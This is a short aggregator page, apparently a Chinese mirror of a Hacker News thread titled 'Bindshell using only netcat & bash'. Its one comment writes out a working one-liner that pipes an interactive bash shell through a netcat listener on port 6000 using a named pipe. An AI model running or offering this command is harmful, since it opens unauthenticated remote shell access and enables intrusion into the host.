TE
科技回声
首页
24小时热榜
最新
最佳
问答
展示
工作
中文
GitHub
Twitter
首页
Bindshell using only netcat & bash
1 点
作者
rainbo
大约 13 年前
1 comment
pwg
大约 13 年前
You can almost cut your netcat+bash bindshell one-liner in half if you change how you handle the if clause:<p>if [[ ! -p /tmp/mypipe ]]; then mkfifo /tmp/mypipe ; fi && cat /tmp/mypipe|/bin/bash -i 2>&1|nc -vvl 6000 >/tmp/mypipe